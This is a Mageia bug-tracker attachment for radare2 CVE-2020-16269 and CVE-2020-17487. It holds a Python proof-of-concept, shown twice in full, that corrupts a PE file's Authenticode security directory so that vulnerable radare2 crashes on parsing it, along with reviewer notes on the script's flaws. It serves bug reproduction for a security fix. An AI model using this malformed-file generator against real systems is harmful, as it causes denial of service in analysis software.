Mageia Bugzilla – Attachment 12538 Details for
Bug 28476
radare2 new security issues CVE-2020-16269 and CVE-2020-17487
Python script to generate a faulty exe file from a PE file
signtest.py (text/x-python3), 2.70 KB, created by
Len Lawrence
on 2021-03-28 16:24:56 CEST
Description:
Python script to generate a faulty exe file from a PE file
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2021-03-28 16:24:56 CEST
Size:
2.70 KB
patch
obsolete
#!/usr/bin/python3
"""Crash reproducer attached to Mageia bug 28476 (radare2, CVE-2020-16269 / CVE-2020-17487).

Reads a PE file given on the command line and writes ``output.exe``, a copy
whose IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode) data is corrupted so that
a vulnerable radare2 crashes when parsing it.  Two strategies are used:

* if the input already has a non-empty security directory, one byte inside it
  (offset +0x7a from the directory start) is incremented in place;
* otherwise a hard-coded blob is implanted into a run of zero bytes in the
  file and the security directory entry is pointed at it.

Usage: ``signtest.py <input.pe>``.  Intended for reproducing the bug in a
sandbox against a vulnerable build; it does not need to run the target.
"""
# NOTE(review): Popen/PIPE/STDOUT, struct and os are imported but never used
# in this script.
from subprocess import Popen, PIPE, STDOUT
import pefile
import sys
import struct
import os

# trigger a segfault in radare2 by modifying the Object Identifier in
# IMAGE_DIRECTORY_ENTRY_SECURITY (in PE files)
# bug found by S01den and Architect (with custom fuzzing)


def get_offset(fname: str) -> int:
    """Return the file offset of the security directory in *fname*, or 0.

    Only the IMAGE_DIRECTORY_ENTRY_SECURITY data directory is parsed.  The
    directory's VirtualAddress is returned as-is and is later used by the
    caller as a raw file offset into the file contents.  Returns 0 when the
    directory is absent or its Size is 0, i.e. the file carries no
    Authenticode signature.
    """
    pe = pefile.PE(fname, fast_load = True)
    # fast_load skips the data directories; parse only the one we need.
    pe.parse_data_directories( directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']])

    sig_offset = 0
    found = 0  # NOTE(review): assigned but never read.

    # __structures__ is a pefile-internal list of parsed structures; the
    # security entry is matched by its name.
    for s in pe.__structures__:
        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
            sig_offset = s.VirtualAddress
            print("[*] IMAGE_DIRECTORY_ENTRY_SECURITY offset = "+hex(sig_offset))
            sig_len = s.Size
            print("[*] Size: "+hex(sig_len))
            # An entry with zero Size means "no signature present".
            if(sig_len <= 0):
                sig_offset = 0

    pe.close()

    return sig_offset


print("__________ _____ ________ _____ _________ .__ ")
print("\______ \_______ ____ _____/ ____\ \_____ \_/ ____\ \_ ___ \____________ _____| |__ ")
print("| ___/\_ __ \/ _ \ / _ \ __\ / | \ __\ / \ \/\_ __ \__ \ / ___/ | \ ")
print("| | | | \( <_> | <_> ) | / | \ | \ \____| | \// __ \_\___ \| Y \ ")
print("|____| |__| \____/ \____/|__| \_______ /__| \______ /|__| (____ /____ >___| / ")
print(" \/ \/ \/ \/ \/ ")

# NOTE(review): no argument check — a missing argument raises IndexError.
fname = sys.argv[1]

sig_offset = get_offset(fname)

# Raw copy of the input; mutated in place in the "signature present" branch.
f = open(fname,'rb')
content = bytearray(f.read())
f.close()

if(sig_offset == 0):
    print("[!] Nothing found... \nTrying to implant anyway")
    i = 0
    # Hard-coded payload written at the chosen offset.  Its leading dword
    # (0x880) matches the Size assigned to the directory entry below; the
    # remainder looks like a DER-encoded certificate structure, but that is
    # not verified here — TODO confirm against the upstream fix.
    exploit = b"\x80\x08\x00\x00\x00\x00\x02\x000\x82\x08s\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x08d0\x82\x08`\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x86\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x0b\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x01b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\x0b\x22"
    # Look for the first 123-byte run of zeros to overwrite.
    # NOTE(review): if no such run exists the loop ends with
    # i == len(content)-123 and the implant proceeds anyway, clobbering
    # whatever is there; the `break` is the only success signal and it is
    # not checked afterwards.
    while i != len(content)-123:
        if content[i:i+123] == b"\x00"*123:
            print(f"[*] Found space at {hex(i)}")
            break
        i += 1

    pe = pefile.PE(fname, fast_load = True)

    # Point the security directory at the implanted blob.  Size 0x880 is
    # larger than the blob actually written (and than the 123-byte hole
    # that was searched for), so the declared region runs past the payload.
    for s in pe.__structures__:
        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
            s.VirtualAddress = i
            s.Size = 0x880
    pe.set_bytes_at_offset(i, exploit)

    pe.write(filename="output.exe")

else:
    # Corrupt one byte at a fixed offset into the existing signature blob;
    # which DER field 0x7a lands on is not documented here.
    # NOTE(review): bytearray item assignment raises ValueError if the byte
    # is already 0xff.
    print("[*] OID found !: "+hex(content[sig_offset+0x7a]))
    content[sig_offset+0x7a] += 1
    f = open("output.exe",'wb')
    f.write(content)
    f.close()

print("[*] D0ne ! ----> output.exe")
#!/usr/bin/python3
"""Crash reproducer attached to Mageia bug 28476 (radare2, CVE-2020-16269 / CVE-2020-17487).

Reads a PE file given on the command line and writes ``output.exe``, a copy
whose IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode) data is corrupted so that
a vulnerable radare2 crashes when parsing it.  Two strategies are used:

* if the input already has a non-empty security directory, one byte inside it
  (offset +0x7a from the directory start) is incremented in place;
* otherwise a hard-coded blob is implanted into a run of zero bytes in the
  file and the security directory entry is pointed at it.

Usage: ``signtest.py <input.pe>``.  Intended for reproducing the bug in a
sandbox against a vulnerable build; it does not need to run the target.
"""
# NOTE(review): Popen/PIPE/STDOUT, struct and os are imported but never used
# in this script.
from subprocess import Popen, PIPE, STDOUT
import pefile
import sys
import struct
import os

# trigger a segfault in radare2 by modifying the Object Identifier in
# IMAGE_DIRECTORY_ENTRY_SECURITY (in PE files)
# bug found by S01den and Architect (with custom fuzzing)


def get_offset(fname: str) -> int:
    """Return the file offset of the security directory in *fname*, or 0.

    Only the IMAGE_DIRECTORY_ENTRY_SECURITY data directory is parsed.  The
    directory's VirtualAddress is returned as-is and is later used by the
    caller as a raw file offset into the file contents.  Returns 0 when the
    directory is absent or its Size is 0, i.e. the file carries no
    Authenticode signature.
    """
    pe = pefile.PE(fname, fast_load = True)
    # fast_load skips the data directories; parse only the one we need.
    pe.parse_data_directories( directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']])

    sig_offset = 0
    found = 0  # NOTE(review): assigned but never read.

    # __structures__ is a pefile-internal list of parsed structures; the
    # security entry is matched by its name.
    for s in pe.__structures__:
        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
            sig_offset = s.VirtualAddress
            print("[*] IMAGE_DIRECTORY_ENTRY_SECURITY offset = "+hex(sig_offset))
            sig_len = s.Size
            print("[*] Size: "+hex(sig_len))
            # An entry with zero Size means "no signature present".
            if(sig_len <= 0):
                sig_offset = 0

    pe.close()

    return sig_offset


print("__________ _____ ________ _____ _________ .__ ")
print("\______ \_______ ____ _____/ ____\ \_____ \_/ ____\ \_ ___ \____________ _____| |__ ")
print("| ___/\_ __ \/ _ \ / _ \ __\ / | \ __\ / \ \/\_ __ \__ \ / ___/ | \ ")
print("| | | | \( <_> | <_> ) | / | \ | \ \____| | \// __ \_\___ \| Y \ ")
print("|____| |__| \____/ \____/|__| \_______ /__| \______ /|__| (____ /____ >___| / ")
print(" \/ \/ \/ \/ \/ ")

# NOTE(review): no argument check — a missing argument raises IndexError.
fname = sys.argv[1]

sig_offset = get_offset(fname)

# Raw copy of the input; mutated in place in the "signature present" branch.
f = open(fname,'rb')
content = bytearray(f.read())
f.close()

if(sig_offset == 0):
    print("[!] Nothing found... \nTrying to implant anyway")
    i = 0
    # Hard-coded payload written at the chosen offset.  Its leading dword
    # (0x880) matches the Size assigned to the directory entry below; the
    # remainder looks like a DER-encoded certificate structure, but that is
    # not verified here — TODO confirm against the upstream fix.
    exploit = b"\x80\x08\x00\x00\x00\x00\x02\x000\x82\x08s\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x08d0\x82\x08`\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x86\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x0b\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x01b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\x0b\x22"
    # Look for the first 123-byte run of zeros to overwrite.
    # NOTE(review): if no such run exists the loop ends with
    # i == len(content)-123 and the implant proceeds anyway, clobbering
    # whatever is there; the `break` is the only success signal and it is
    # not checked afterwards.
    while i != len(content)-123:
        if content[i:i+123] == b"\x00"*123:
            print(f"[*] Found space at {hex(i)}")
            break
        i += 1

    pe = pefile.PE(fname, fast_load = True)

    # Point the security directory at the implanted blob.  Size 0x880 is
    # larger than the blob actually written (and than the 123-byte hole
    # that was searched for), so the declared region runs past the payload.
    for s in pe.__structures__:
        if s.name == 'IMAGE_DIRECTORY_ENTRY_SECURITY':
            s.VirtualAddress = i
            s.Size = 0x880
    pe.set_bytes_at_offset(i, exploit)

    pe.write(filename="output.exe")

else:
    # Corrupt one byte at a fixed offset into the existing signature blob;
    # which DER field 0x7a lands on is not documented here.
    # NOTE(review): bytearray item assignment raises ValueError if the byte
    # is already 0xff.
    print("[*] OID found !: "+hex(content[sig_offset+0x7a]))
    content[sig_offset+0x7a] += 1
    f = open("output.exe",'wb')
    f.write(content)
    f.close()

print("[*] D0ne ! ----> output.exe")